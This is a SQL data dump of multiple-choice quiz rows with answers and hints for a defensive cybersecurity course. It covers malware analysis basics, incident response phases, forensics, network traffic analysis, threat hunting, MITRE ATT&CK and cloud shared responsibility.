(5988, 264, 'Why hash a malware sample before analysis?', 3, 'To check VirusTotal for known info', 0, 'Lookup', '2025-12-26 22:55:56', '[\"To delete it\", \"To check VirusTotal for known info\", \"To run it\", \"To rename it\"]'),
(5989, 265, 'What is Any.Run used for?', 1, 'Interactive malware sandboxing', 0, 'Sandbox', '2025-12-26 22:55:56', '[\"Static analysis\", \"Interactive malware sandboxing\", \"Coding\", \"Email\"]'),
(5990, 265, 'If malware adds a \"Run\" registry key, what is it likely achieving?', 2, 'Persistence (auto-start)', 0, 'Persistence', '2025-12-26 22:55:56', '[\"Deleting files\", \"Persistence (auto-start)\", \"Playing music\", \"Updating\"]'),
(5991, 265, 'How might malware detect it is in a sandbox?', 3, 'Looking for VM artifacts or lack of user activity', 0, 'Evasion', '2025-12-26 22:55:56', '[\"By asking the user\", \"Looking for VM artifacts or lack of user activity\", \"By checking the calendar\", \"By running fast\"]'),
(5992, 266, 'What does IOC stand for?', 1, 'Indicators of Compromise', 0, 'Evidence', '2025-12-26 22:55:56', '[\"Internet of Computers\", \"Indicators of Compromise\", \"Input Output Control\", \"Internal Office Command\"]'),
(5993, 266, 'What is a \"Mutex\" in malware context?', 2, 'A unique name to prevent multiple instances', 0, 'Single instance', '2025-12-26 22:55:56', '[\"A virus type\", \"A unique name to prevent multiple instances\", \"A password\", \"A file extension\"]'),
(5994, 266, 'Which framework maps malware techniques?', 3, 'MITRE ATT&CK', 0, 'Tactics', '2025-12-26 22:55:56', '[\"NIST\", \"MITRE ATT&CK\", \"ISO 27001\", \"PCI DSS\"]'),
(5995, 267, 'Which malware hides deep in the OS to maintain persistent access?', 1, 'Rootkit', 0, 'Hidden', '2025-12-26 22:55:56', '[\"Worm\", \"Trojan\", \"Rootkit\", \"Virus\"]'),
(5996, 267, 'Which attack gives an attacker full remote control?', 2, 'RAT (Remote Access Trojan)', 0, 'Remote', '2025-12-26 22:55:56', '[\"Rootkit\", \"Spyware\", \"RAT (Remote Access Trojan)\", \"Worm\"]'),
(5997, 267, 'Running malware in a sandbox is called:', 3, 'Dynamic Analysis', 0, 'Execute', '2025-12-26 22:55:56', '[\"Static Analysis\", \"Dynamic Analysis\", \"Passive Analysis\", \"Code Review\"]'),
(5998, 267, 'Examining a file without executing it is:', 4, 'Static Analysis', 0, 'Safe', '2025-12-26 22:55:56', '[\"Dynamic Analysis\", \"Static Analysis\", \"Behavioral Analysis\", \"Reverse Engineering\"]'),
(5999, 267, 'What does PEStudio analyze?', 5, 'Windows PE (Executable) files', 0, 'EXE', '2025-12-26 22:55:56', '[\"Linux binaries\", \"Windows PE (Executable) files\", \"Network packets\", \"JSON files\"]'),
(6000, 267, 'If malware \"sleeps\" for a long time, what might it be doing?', 6, 'Evading sandbox analysis', 0, 'Timeout', '2025-12-26 22:55:56', '[\"Updating\", \"Evading sandbox analysis\", \"Nothing suspicious\", \"Downloading updates\"]'),
(6001, 271, 'What does CSIRT stand for?', 1, 'Computer Security Incident Response Team', 0, 'Team', '2025-12-26 23:03:48', '[\"Cyber Security Internal Review Team\", \"Computer Security Incident Response Team\", \"Critical System IR Team\", \"Cloud Security IR Task\"]'),
(6002, 271, 'Why is a documented IR process important?', 2, 'It ensures consistent and fast response', 0, 'Consistency', '2025-12-26 23:03:48', '[\"It looks good\", \"It ensures consistent and fast response\", \"It is optional\", \"It slows things down\"]'),
(6003, 271, 'Which of these is an example of a security incident?', 3, 'Malware infection', 0, 'Breach', '2025-12-26 23:03:48', '[\"Password reset\", \"Malware infection\", \"Software update\", \"New employee onboarding\"]'),
(6004, 272, 'How many phases are in the NIST IR lifecycle?', 1, '4', 0, 'Four', '2025-12-26 23:03:48', '[\"3\", \"4\", \"5\", \"6\"]'),
(6005, 272, 'Which phase comes after \"Detection & Analysis\"?', 2, 'Containment, Eradication & Recovery', 0, 'Next', '2025-12-26 23:03:48', '[\"Preparation\", \"Containment, Eradication & Recovery\", \"Post-Incident\", \"None\"]'),
(6006, 272, 'What happens after \"Lessons Learned\"?', 3, 'Loop back to Preparation (improvement)', 0, 'Cycle', '2025-12-26 23:03:48', '[\"Nothing\", \"Loop back to Preparation (improvement)\", \"Delete everything\", \"Close the case\"]'),
(6007, 273, 'What is a \"Playbook\" in IR context?', 1, 'A step-by-step guide for handling specific incidents', 0, 'Runbook', '2025-12-26 23:03:48', '[\"A video game\", \"A step-by-step guide for handling specific incidents\", \"A backup plan\", \"A training manual\"]'),
(6008, 273, 'What is a \"Jump Bag\"?', 2, 'Pre-packed forensic tools for on-site response', 0, 'Go Bag', '2025-12-26 23:03:48', '[\"A travel bag\", \"Pre-packed forensic tools for on-site response\", \"A backup drive\", \"A parachute\"]'),
(6009, 273, 'Why is \"Baselining\" systems important?', 3, 'To know what normal looks like', 0, 'Comparison', '2025-12-26 23:03:48', '[\"It is not\", \"To know what normal looks like\", \"To delete old files\", \"To upgrade software\"]'),
(6010, 274, 'What is the first step in analysis?', 1, 'Validate if it is a True Positive', 0, 'Confirm', '2025-12-26 23:03:48', '[\"Delete the alert\", \"Validate if it is a True Positive\", \"Call the police\", \"Ignore it\"]'),
(6011, 274, 'What should you start documenting immediately?', 2, 'A timeline of events', 0, 'Timeline', '2025-12-26 23:03:48', '[\"A blog post\", \"A timeline of events\", \"A resignation letter\", \"A shopping list\"]'),
(6012, 274, 'Who might notify you of an incident externally?', 3, 'FBI, vendor, or partner', 0, 'External', '2025-12-26 23:03:48', '[\"The janitor\", \"FBI, vendor, or partner\", \"The intern\", \"Nobody\"]'),
(6013, 275, 'What is \"Short-Term Containment\"?', 1, 'Immediate actions to stop the attack', 0, 'Quick fix', '2025-12-26 23:03:48', '[\"Long-term planning\", \"Immediate actions to stop the attack\", \"Deleting files\", \"Rebooting\"]'),
(6014, 275, 'Why should you NOT shut down a compromised machine immediately?', 2, 'Volatile memory (RAM) evidence is lost', 0, 'Forensics', '2025-12-26 23:03:48', '[\"It is faster\", \"Volatile memory (RAM) evidence is lost\", \"It makes noise\", \"It uses electricity\"]'),
(6015, 275, 'What is a quarantine VLAN used for?', 3, 'Isolating compromised systems while keeping them accessible', 0, 'Isolation', '2025-12-26 23:03:48', '[\"Gaming\", \"Isolating compromised systems while keeping them accessible\", \"Faster internet\", \"Printer sharing\"]'),
(6016, 276, 'What must be removed during Eradication?', 1, 'Malware and persistence mechanisms', 0, 'Cleanup', '2025-12-26 23:03:48', '[\"User files\", \"Malware and persistence mechanisms\", \"Operating system\", \"All software\"]'),
(6017, 276, 'Before reconnecting a recovered system, what should you do?', 2, 'Validate it is clean', 0, 'Verify', '2025-12-26 23:03:48', '[\"Just plug it in\", \"Validate it is clean\", \"Delete everything\", \"Ignore it\"]'),
(6018, 276, 'Why \"gradual reconnection\"?', 3, 'To detect re-infection before spreading', 0, 'Careful', '2025-12-26 23:03:48', '[\"It is slower\", \"To detect re-infection before spreading\", \"To save power\", \"It looks professional\"]'),
(6019, 277, 'When should the Lessons Learned meeting be held?', 1, 'Within 1-2 weeks of incident closure', 0, 'Soon', '2025-12-26 23:03:48', '[\"Never\", \"Within 1-2 weeks of incident closure\", \"After 1 year\", \"During the incident\"]'),
(6020, 277, 'What is the purpose of a Post-Incident Report?', 2, 'Document what happened and recommendations', 0, 'Documentation', '2025-12-26 23:03:48', '[\"To blame someone\", \"Document what happened and recommendations\", \"To close the ticket\", \"To delete logs\"]'),
(6021, 277, 'How do you prevent similar incidents?', 3, 'Update SIEM rules, playbooks, and train staff', 0, 'Improve', '2025-12-26 23:03:48', '[\"Ignore it\", \"Update SIEM rules, playbooks, and train staff\", \"Fire everyone\", \"Do nothing\"]'),
(6022, 278, 'Which framework defines the 4-phase IR lifecycle?', 1, 'NIST SP 800-61', 0, 'Standard', '2025-12-26 23:03:48', '[\"ISO 27001\", \"NIST SP 800-61\", \"PCI DSS\", \"HIPAA\"]'),
(6023, 278, 'What is the first phase of IR?', 2, 'Preparation', 0, 'First', '2025-12-26 23:03:48', '[\"Detection\", \"Preparation\", \"Containment\", \"Recovery\"]'),
(6024, 278, 'Isolating a host from the network is part of which phase?', 3, 'Containment', 0, 'Isolate', '2025-12-26 23:03:48', '[\"Preparation\", \"Detection\", \"Containment\", \"Eradication\"]'),
(6025, 278, 'Why preserve volatile memory (RAM)?', 4, 'It contains forensic evidence lost on shutdown', 0, 'Evidence', '2025-12-26 23:03:48', '[\"It is faster\", \"It contains forensic evidence lost on shutdown\", \"It is pretty\", \"No reason\"]'),
(6026, 278, 'What document guides response to specific incident types?', 5, 'Playbook', 0, 'Runbook', '2025-12-26 23:03:48', '[\"Resume\", \"Playbook\", \"Novel\", \"Menu\"]'),
(6027, 278, 'What happens in the \"Post-Incident\" phase?', 6, 'Lessons Learned and improvement', 0, 'Review', '2025-12-26 23:03:48', '[\"Panic\", \"Lessons Learned and improvement\", \"Vacation\", \"Nothing\"]'),
(6028, 281, 'What is the \"Golden Rule\" of forensics?', 1, 'Preserve the evidence', 0, 'Do not alter', '2025-12-26 23:05:09', '[\"Delete everything\", \"Preserve the evidence\", \"Work fast\", \"Guess the answer\"]'),
(6029, 281, 'Which forensics type focuses on RAM?', 2, 'Memory Forensics', 0, 'Volatile', '2025-12-26 23:05:09', '[\"Disk\", \"Memory Forensics\", \"Network\", \"Mobile\"]'),
(6030, 281, 'Why is forensics used in lawsuits?', 3, 'eDiscovery and litigation support', 0, 'Legal', '2025-12-26 23:05:09', '[\"For fun\", \"eDiscovery and litigation support\", \"To delete evidence\", \"To hack\"]'),
(6031, 282, 'What is the first phase of the forensic process?', 1, 'Identification', 0, 'Find', '2025-12-26 23:05:09', '[\"Analysis\", \"Identification\", \"Presentation\", \"Deletion\"]'),
(6032, 282, 'Which tool is used for free disk imaging?', 2, 'FTK Imager', 0, 'Free', '2025-12-26 23:05:09', '[\"Wireshark\", \"FTK Imager\", \"Nmap\", \"Burp Suite\"]'),
(6033, 282, 'What document tracks who touched the evidence?', 3, 'Chain of Custody', 0, 'Log', '2025-12-26 23:05:09', '[\"Resume\", \"Chain of Custody\", \"Invoice\", \"Email\"]'),
(6034, 283, 'What happens if Chain of Custody is broken?', 1, 'Evidence may be inadmissible in court', 0, 'Thrown out', '2025-12-26 23:05:09', '[\"Nothing\", \"Evidence may be inadmissible in court\", \"Faster trial\", \"Automatic win\"]'),
(6035, 283, 'What does a write blocker do?', 2, 'Allows reading but prevents writing to evidence', 0, 'Read-only', '2025-12-26 23:05:09', '[\"Speeds up the disk\", \"Allows reading but prevents writing to evidence\", \"Encrypts data\", \"Deletes files\"]'),
(6036, 283, 'What should you do before touching evidence?', 3, 'Photograph the scene', 0, 'Document', '2025-12-26 23:05:09', '[\"Delete logs\", \"Photograph the scene\", \"Guess\", \"Nothing\"]'),
(6037, 284, 'Why should you image a disk before analysis?', 1, 'To preserve the original evidence', 0, 'Protect', '2025-12-26 23:05:09', '[\"It is faster\", \"To preserve the original evidence\", \"To delete files\", \"No reason\"]'),
(6038, 284, 'Which acquisition type captures deleted data?', 2, 'Physical Image', 0, 'Complete', '2025-12-26 23:05:09', '[\"Logical\", \"Physical Image\", \"Live\", \"None\"]'),
(6039, 284, 'How do you verify a disk image is accurate?', 3, 'Compare hashes of source and image', 0, 'Hash match', '2025-12-26 23:05:09', '[\"Guess\", \"Compare hashes of source and image\", \"Look at it\", \"Count files\"]'),
(6040, 285, 'What is the MFT in NTFS?', 1, 'Master File Table - database of all files', 0, 'Index', '2025-12-26 23:05:09', '[\"Main Folder Tree\", \"Master File Table - database of all files\", \"Memory File Track\", \"My First Table\"]'),
(6041, 285, 'What can Alternate Data Streams (ADS) be used for?', 2, 'Hiding data attached to files', 0, 'Steganography', '2025-12-26 23:05:09', '[\"Speeding up reads\", \"Hiding data attached to files\", \"Compressing files\", \"Encrypting\"]'),
(6042, 285, 'What is \"Timestomping\"?', 3, 'Modifying timestamps to hide activity', 0, 'Anti-forensics', '2025-12-26 23:05:09', '[\"Creating timestamps\", \"Modifying timestamps to hide activity\", \"Deleting timestamps\", \"Reading timestamps\"]'),
(6043, 286, 'Which registry hive contains user password hashes?', 1, 'SAM', 0, 'Security', '2025-12-26 23:05:09', '[\"SYSTEM\", \"SAM\", \"SOFTWARE\", \"NTUSER\"]'),
(6044, 286, 'What does Prefetch show?', 2, 'Programs that have been executed', 0, 'Execution', '2025-12-26 23:05:09', '[\"Network connections\", \"Programs that have been executed\", \"Passwords\", \"Emails\"]'),
(6045, 286, 'Where are Windows Event Logs stored?', 3, 'C:\\Windows\\System32\\winevt', 0, 'Logs path', '2025-12-26 23:05:09', '[\"Desktop\", \"C:\\\\Windows\\\\System32\\\\winevt\", \"Recycle Bin\", \"Documents\"]'),
(6046, 287, 'What is the golden rule of forensics?', 1, 'Preserve the evidence', 0, 'Protect', '2025-12-26 23:05:09', '[\"Analyze fast\", \"Preserve the evidence\", \"Delete duplicates\", \"Guess\"]'),
(6047, 287, 'Which tool is commonly used for memory forensics?', 2, 'Volatility', 0, 'RAM', '2025-12-26 23:05:09', '[\"FTK Imager\", \"Volatility\", \"Wireshark\", \"Nmap\"]'),
(6048, 287, 'What does a write blocker prevent?', 3, 'Writing to evidence (preserve integrity)', 0, 'Read-only', '2025-12-26 23:05:09', '[\"Reading\", \"Writing to evidence (preserve integrity)\", \"Deleting\", \"Copying\"]'),
(6049, 287, 'Which Windows artifact tracks program execution?', 4, 'Prefetch', 0, 'Execution', '2025-12-26 23:05:09', '[\"SAM\", \"NTUSER\", \"Prefetch\", \"Cookies\"]'),
(6050, 287, 'What file system feature allows hidden data in NTFS?', 5, 'Alternate Data Streams (ADS)', 0, 'Hidden', '2025-12-26 23:05:09', '[\"MFT\", \"Alternate Data Streams (ADS)\", \"Journal\", \"Inodes\"]'),
(6051, 287, 'What is the purpose of hashing a disk image?', 6, 'Verify image integrity', 0, 'Verification', '2025-12-26 23:05:09', '[\"Compress it\", \"Verify image integrity\", \"Encrypt it\", \"Delete it\"]'),
(6052, 291, 'What does NTA stand for?', 1, 'Network Traffic Analysis', 0, 'NTA', '2025-12-26 23:06:44', '[\"Network Threat Assessment\", \"Network Traffic Analysis\", \"New Technology Application\", \"None\"]'),
(6053, 291, 'What limits your ability to see packet content?', 2, 'Encryption (TLS)', 0, 'Hidden', '2025-12-26 23:06:44', '[\"Speed\", \"Encryption (TLS)\", \"Color\", \"Size\"]'),
(6054, 291, 'What can you determine from packet headers?', 3, 'Source/Destination IPs and ports', 0, 'Metadata', '2025-12-26 23:06:44', '[\"File contents\", \"Source/Destination IPs and ports\", \"Passwords\", \"Nothing\"]'),
(6055, 292, 'What is a SPAN port?', 1, 'A switch port that mirrors traffic for monitoring', 0, 'Mirror', '2025-12-26 23:06:44', '[\"A special cable\", \"A switch port that mirrors traffic for monitoring\", \"A firewall rule\", \"An IP address\"]'),
(6056, 292, 'What file format stores captured packets?', 2, 'PCAP', 0, 'Packet file', '2025-12-26 23:06:44', '[\"PDF\", \"PCAP\", \"DOCX\", \"MP4\"]'),
(6057, 292, 'Which tool is a GUI for packet analysis?', 3, 'Wireshark', 0, 'GUI', '2025-12-26 23:06:44', '[\"tcpdump\", \"Wireshark\", \"grep\", \"nmap\"]'),
(6058, 293, 'What Wireshark feature reconstructs a conversation?', 1, 'Follow TCP Stream', 0, 'Conversation', '2025-12-26 23:06:44', '[\"Export\", \"Follow TCP Stream\", \"Filter\", \"Capture\"]'),
(6059, 293, 'What is a \"Display Filter\" used for?', 2, 'Showing only relevant packets', 0, 'Focus', '2025-12-26 23:06:44', '[\"Capturing packets\", \"Showing only relevant packets\", \"Deleting packets\", \"Encrypting packets\"]'),
(6060, 293, 'Which filter shows only DNS traffic?', 3, 'dns', 0, 'Protocol', '2025-12-26 23:06:44', '[\"tcp\", \"udp\", \"dns\", \"http\"]'),
(6061, 294, 'What is the first step of the TCP handshake?', 1, 'SYN', 0, 'Start', '2025-12-26 23:06:44', '[\"ACK\", \"FIN\", \"SYN\", \"RST\"]'),
(6062, 294, 'How can you extract files from HTTP traffic in Wireshark?', 2, 'Export Objects > HTTP', 0, 'File extraction', '2025-12-26 23:06:44', '[\"Copy paste\", \"Export Objects > HTTP\", \"Print\", \"Screenshot\"]'),
(6063, 294, 'What might a very long User-Agent string indicate?', 3, 'Buffer overflow attempt', 0, 'Attack', '2025-12-26 23:06:44', '[\"Normal traffic\", \"Buffer overflow attempt\", \"Slow browser\", \"Mobile device\"]'),
(6064, 295, 'What is \"Beaconing\"?', 1, 'Regular, timed connections to a C2 server', 0, 'Heartbeat', '2025-12-26 23:06:44', '[\"Random traffic\", \"Regular, timed connections to a C2 server\", \"Fast traffic\", \"Encrypted traffic\"]'),
(6065, 295, 'Why is port 4444 suspicious?', 2, 'Default Metasploit/Meterpreter port', 0, 'Known bad', '2025-12-26 23:06:44', '[\"It is slow\", \"Default Metasploit/Meterpreter port\", \"It is encrypted\", \"It is common\"]'),
(6066, 295, 'What does DGA stand for?', 3, 'Domain Generation Algorithm', 0, 'Random domains', '2025-12-26 23:06:44', '[\"Data Gathering API\", \"Domain Generation Algorithm\", \"Dynamic Gateway Access\", \"Direct Gateway Address\"]'),
(6067, 296, 'What was Zeek formerly known as?', 1, 'Bro', 0, 'Old name', '2025-12-26 23:06:44', '[\"Wireshark\", \"Bro\", \"tcpdump\", \"Snort\"]'),
(6068, 296, 'Which Zeek log tracks all network connections?', 2, 'conn.log', 0, 'Connections', '2025-12-26 23:06:44', '[\"http.log\", \"dns.log\", \"conn.log\", \"ssl.log\"]'),
(6069, 296, 'How is Zeek different from Wireshark?', 3, 'Zeek generates structured logs, better for automation', 0, 'Logs', '2025-12-26 23:06:44', '[\"Zeek has GUI\", \"Zeek generates structured logs, better for automation\", \"Zeek is slower\", \"No difference\"]'),
(6070, 297, 'What tool is used for command-line packet capture on Linux?', 1, 'tcpdump', 0, 'CLI', '2025-12-26 23:06:44', '[\"Wireshark\", \"tcpdump\", \"Nmap\", \"Netcat\"]'),
(6071, 297, 'Which Wireshark filter shows HTTP requests?', 2, 'http.request', 0, 'HTTP', '2025-12-26 23:06:44', '[\"tcp.port\", \"http.request\", \"dns\", \"frame\"]'),
(6072, 297, 'What is the TCP handshake sequence?', 3, 'SYN, SYN-ACK, ACK', 0, 'Three-way', '2025-12-26 23:06:44', '[\"ACK, SYN, FIN\", \"SYN, SYN-ACK, ACK\", \"FIN, ACK, RST\", \"None\"]'),
(6073, 297, 'What does beaconing traffic indicate?', 4, 'Possible C2 communication', 0, 'Malware', '2025-12-26 23:06:44', '[\"Normal browsing\", \"Possible C2 communication\", \"File download\", \"Email\"]'),
(6074, 297, 'Which Zeek log tracks DNS queries?', 5, 'dns.log', 0, 'DNS', '2025-12-26 23:06:44', '[\"conn.log\", \"http.log\", \"dns.log\", \"files.log\"]'),
(6075, 297, 'What file format stores captured packets?', 6, 'PCAP', 0, 'Capture', '2025-12-26 23:06:44', '[\"CSV\", \"PCAP\", \"JSON\", \"XML\"]'),
(6076, 301, 'What is the difference between SOC and Threat Hunting?', 1, 'SOC reacts to alerts; Hunting proactively searches', 0, 'Proactive', '2025-12-26 23:08:10', '[\"No difference\", \"SOC reacts to alerts; Hunting proactively searches\", \"Hunting is automated\", \"SOC is proactive\"]'),
(6077, 301, 'What is \"Dwell Time\"?', 2, 'Time an attacker stays undetected in the network', 0, 'Hidden', '2025-12-26 23:08:10', '[\"Time to read alerts\", \"Time an attacker stays undetected in the network\", \"Shift duration\", \"Lunch break\"]'),
(6078, 301, 'Why are APTs hard to detect?', 3, 'They specifically evade automated detection', 0, 'Stealth', '2025-12-26 23:08:10', '[\"They are slow\", \"They specifically evade automated detection\", \"They use email\", \"They are loud\"]'),
(6079, 302, 'Detection relies on what?', 1, 'Pre-defined rules/signatures', 0, 'Rules', '2025-12-26 23:08:10', '[\"Guessing\", \"Pre-defined rules/signatures\", \"Luck\", \"Magic\"]'),
(6080, 302, 'What should happen after a successful hunt?', 2, 'Create a detection rule for future attacks', 0, 'Automate', '2025-12-26 23:08:10', '[\"Delete logs\", \"Create a detection rule for future attacks\", \"Ignore it\", \"Take vacation\"]'),
(6081, 302, 'At HMM Level 3, hunts are:', 3, 'Proactive and hypothesis-driven', 0, 'Mature', '2025-12-26 23:08:10', '[\"Nonexistent\", \"Random\", \"Proactive and hypothesis-driven\", \"Fully automated\"]'),
(6082, 303, 'What is the first step of the Hunting Loop?', 1, 'Form a Hypothesis', 0, 'Start', '2025-12-26 23:08:10', '[\"Collect data\", \"Form a Hypothesis\", \"Report\", \"Delete logs\"]'),
(6083, 303, 'If a hunt finds nothing malicious, was it wasted?', 2, 'No, you learned what normal looks like', 0, 'Value', '2025-12-26 23:08:10', '[\"Yes\", \"No, you learned what normal looks like\", \"Maybe\", \"Always\"]'),
(6084, 303, 'What should happen after a hunt?', 3, 'Document findings and create detections', 0, 'Improve', '2025-12-26 23:08:10', '[\"Delete evidence\", \"Document findings and create detections\", \"Forget it\", \"Nothing\"]'),
(6085, 304, 'What makes a good hunting hypothesis?', 1, 'Specific, actionable, based on threat intel', 0, 'Focused', '2025-12-26 23:08:10', '[\"Vague and broad\", \"Specific, actionable, based on threat intel\", \"Random\", \"Long\"]'),
(6086, 304, 'Which framework maps attacker techniques?', 2, 'MITRE ATT&CK', 0, 'Framework', '2025-12-26 23:08:10', '[\"NIST\", \"MITRE ATT&CK\", \"ISO 27001\", \"PCI DSS\"]'),
(6087, 304, 'What is a bad hypothesis?', 3, 'Something bad might happen (too vague)', 0, 'Unfocused', '2025-12-26 23:08:10', '[\"Attackers use PowerShell\", \"Something bad might happen (too vague)\", \"DNS tunneling exists\", \"Phishing leads to C2\"]'),
(6088, 305, 'Which data source shows process command lines?', 1, 'EDR', 0, 'Endpoint', '2025-12-26 23:08:10', '[\"Firewall\", \"EDR\", \"DNS\", \"Proxy\"]'),
(6089, 305, 'What is important about log retention?', 2, 'Determines how far back you can hunt', 0, 'History', '2025-12-26 23:08:10', '[\"It is not important\", \"Determines how far back you can hunt\", \"Makes logs colorful\", \"Speeds up queries\"]'),
(6090, 305, 'What tool enhances Windows logging for hunting?', 3, 'Sysmon', 0, 'Windows', '2025-12-26 23:08:10', '[\"Wireshark\", \"Sysmon\", \"Nmap\", \"Burp Suite\"]'),
(6091, 306, 'What does \"Long Tail Analysis\" focus on?', 1, 'Rare occurrences (outliers)', 0, 'Unusual', '2025-12-26 23:08:10', '[\"Common events\", \"Rare occurrences (outliers)\", \"Fast events\", \"Old events\"]'),
(6092, 306, 'In \"Stack Counting\", what is suspicious?', 2, 'Values that appear very rarely', 0, 'Rare', '2025-12-26 23:08:10', '[\"Values that appear often\", \"Values that appear very rarely\", \"All values\", \"No values\"]'),
(6093, 306, 'What is \"Pivoting\" in hunting?', 3, 'Moving from one indicator to related data', 0, 'Connect', '2025-12-26 23:08:10', '[\"Rotating chairs\", \"Moving from one indicator to related data\", \"Deleting logs\", \"Blocking IPs\"]'),
(6094, 307, 'Threat Hunting is:', 1, 'Proactive search for undetected threats', 0, 'Hunt', '2025-12-26 23:08:10', '[\"Waiting for alerts\", \"Proactive search for undetected threats\", \"Deleting logs\", \"Writing reports\"]'),
(6095, 307, 'What is \"Dwell Time\"?', 2, 'Time attacker remains undetected', 0, 'Hidden', '2025-12-26 23:08:10', '[\"Time to lunch\", \"Time attacker remains undetected\", \"Shift length\", \"Meeting time\"]'),
(6096, 307, 'A good hypothesis is:', 3, 'Specific and actionable', 0, 'Focused', '2025-12-26 23:08:10', '[\"Vague\", \"Specific and actionable\", \"Random\", \"Long\"]'),
(6097, 307, 'What framework maps adversary techniques?', 4, 'MITRE ATT&CK', 0, 'Matrix', '2025-12-26 23:08:10', '[\"NIST\", \"MITRE ATT&CK\", \"ISO\", \"PCI\"]'),
(6098, 307, 'Long Tail Analysis focuses on:', 5, 'Rare occurrences', 0, 'Outliers', '2025-12-26 23:08:10', '[\"Common events\", \"Rare occurrences\", \"Fast events\", \"All events\"]'),
(6099, 307, 'After finding a threat, you should:', 6, 'Create a detection rule', 0, 'Automate', '2025-12-26 23:08:10', '[\"Delete it\", \"Create a detection rule\", \"Ignore it\", \"Hide it\"]'),
(6100, 311, 'What does MITRE ATT&CK provide?', 1, 'Knowledge base of adversary tactics and techniques', 0, 'Framework', '2025-12-26 23:09:24', '[\"A firewall\", \"Knowledge base of adversary tactics and techniques\", \"An antivirus\", \"A SIEM\"]'),
(6101, 311, 'What does a \"Tactic\" represent?', 2, 'The adversary\'s goal', 0, 'Why', '2025-12-26 23:09:24', '[\"A specific tool\", \"The adversary\'s goal\", \"A CVE\", \"A patch\"]'),
(6102, 311, 'Which matrix covers Windows, Linux, macOS?', 3, 'Enterprise', 0, 'Main', '2025-12-26 23:09:24', '[\"Mobile\", \"Enterprise\", \"ICS\", \"Cloud\"]'),
(6103, 312, 'How many Enterprise tactics are there?', 1, '14', 0, 'Fourteen', '2025-12-26 23:09:24', '[\"10\", \"12\", \"14\", \"20\"]'),
(6104, 312, 'Which tactic involves stealing passwords?', 2, 'Credential Access', 0, 'Passwords', '2025-12-26 23:09:24', '[\"Execution\", \"Credential Access\", \"Discovery\", \"Impact\"]'),
(6105, 312, 'Which tactic is about maintaining access after initial compromise?', 3, 'Persistence', 0, 'Stay', '2025-12-26 23:09:24', '[\"Initial Access\", \"Persistence\", \"Exfiltration\", \"Collection\"]'),
(6106, 313, 'What is a \"Sub-Technique\"?', 1, 'A more specific method under a main technique', 0, 'Specific', '2025-12-26 23:09:24', '[\"A different framework\", \"A more specific method under a main technique\", \"A tool\", \"A tactic\"]'),
(6107, 313, 'T1059.001 refers to:', 2, 'PowerShell execution', 0, 'Script', '2025-12-26 23:09:24', '[\"Registry\", \"PowerShell execution\", \"DNS\", \"HTTP\"]'),
(6108, 313, 'What is a \"Procedure\" in ATT&CK?', 3, 'Real-world example of technique usage', 0, 'Example', '2025-12-26 23:09:24', '[\"A tactic\", \"Real-world example of technique usage\", \"A sub-technique\", \"A detection rule\"]'),
(6109, 314, 'What tool visualizes ATT&CK coverage?', 1, 'ATT&CK Navigator', 0, 'Tool', '2025-12-26 23:09:24', '[\"Wireshark\", \"ATT&CK Navigator\", \"Nmap\", \"Burp Suite\"]'),
(6110, 314, 'In the matrix, columns represent:', 2, 'Tactics', 0, 'Goals', '2025-12-26 23:09:24', '[\"Techniques\", \"Tactics\", \"Procedures\", \"Tools\"]'),
(6111, 314, 'What format provides machine-readable ATT&CK data?', 3, 'STIX', 0, 'Standard', '2025-12-26 23:09:24', '[\"PDF\", \"STIX\", \"CSV\", \"DOCX\"]'),
(6112, 315, 'How can ATT&CK help evaluate a security product?', 1, 'Check if it detects specific techniques', 0, 'Evaluation', '2025-12-26 23:09:24', '[\"By price\", \"Check if it detects specific techniques\", \"By color\", \"By name\"]'),
(6113, 315, 'What is \"Gap Analysis\" in ATT&CK context?', 2, 'Identifying techniques you cannot detect', 0, 'Missing', '2025-12-26 23:09:24', '[\"Finding bugs\", \"Identifying techniques you cannot detect\", \"Deleting logs\", \"Writing reports\"]'),
(6114, 315, 'Threat-Informed Defense means:', 3, 'Building defenses based on likely threat actors', 0, 'Focused', '2025-12-26 23:09:24', '[\"Random defenses\", \"Building defenses based on likely threat actors\", \"No defenses\", \"Old defenses\"]'),
(6115, 316, 'ATT&CK stands for:', 1, 'Adversarial Tactics, Techniques, and Common Knowledge', 0, 'Meaning', '2025-12-26 23:09:24', '[\"Attack Technical Team\", \"Adversarial Tactics, Techniques, and Common Knowledge\", \"Automated Threat Testing\", \"None\"]'),
(6116, 316, 'How many Enterprise tactics are there?', 2, '14', 0, 'Count', '2025-12-26 23:09:24', '[\"10\", \"12\", \"14\", \"16\"]'),
(6117, 316, 'Techniques describe:', 3, 'How adversaries achieve goals', 0, 'Method', '2025-12-26 23:09:24', '[\"Why they attack\", \"How adversaries achieve goals\", \"Who attacks\", \"When attacks happen\"]'),
(6118, 316, 'T1059 refers to:', 4, 'Command and Scripting Interpreter', 0, 'Execution', '2025-12-26 23:09:24', '[\"Persistence\", \"Command and Scripting Interpreter\", \"Discovery\", \"Exfiltration\"]'),
(6119, 316, 'Which tool visualizes ATT&CK coverage?', 5, 'Navigator', 0, 'Visualization', '2025-12-26 23:09:24', '[\"Wireshark\", \"Navigator\", \"Nmap\", \"Burp\"]'),
(6120, 316, 'Gap Analysis identifies:', 6, 'Techniques you cannot detect', 0, 'Blind spots', '2025-12-26 23:09:24', '[\"Best techniques\", \"Techniques you cannot detect\", \"Fast techniques\", \"Old techniques\"]'),
(6121, 321, 'In IaaS, who is responsible for patching the OS?', 1, 'The customer', 0, 'You', '2025-12-26 23:10:39', '[\"The provider\", \"The customer\", \"Nobody\", \"Microsoft\"]'),
(6122, 321, 'Which model gives you just the application?', 2, 'SaaS', 0, 'Software', '2025-12-26 23:10:39', '[\"IaaS\", \"PaaS\", \"SaaS\", \"None\"]'),
(6123, 321, 'AWS EC2 is an example of:', 3, 'IaaS', 0, 'Infrastructure', '2025-12-26 23:10:39', '[\"PaaS\", \"SaaS\", \"IaaS\", \"FaaS\"]'),
(6124, 322, 'Who secures the physical data center?', 1, 'The cloud provider', 0, 'Provider', '2025-12-26 23:10:39', '[\"Customer\", \"The cloud provider\", \"Government\", \"Nobody\"]'),
(6125, 322, 'IAM is whose responsibility?', 2, 'The customer (always)', 0, 'You', '2025-12-26 23:10:39', '[\"Provider\", \"The customer (always)\", \"Maybe both\", \"Neither\"]'),
(6126, 322, 'In SaaS, what does the customer manage?', 3, 'Data and user access', 0, 'Limited', '2025-12-26 23:10:39', '[\"Everything\", \"Data and user access\", \"Hardware\", \"Nothing\"]'),
(6127, 323, 'Which AWS service logs API calls?', 1, 'CloudTrail', 0, 'Audit', '2025-12-26 23:10:39', '[\"GuardDuty\", \"CloudTrail\", \"Config\", \"WAF\"]'),
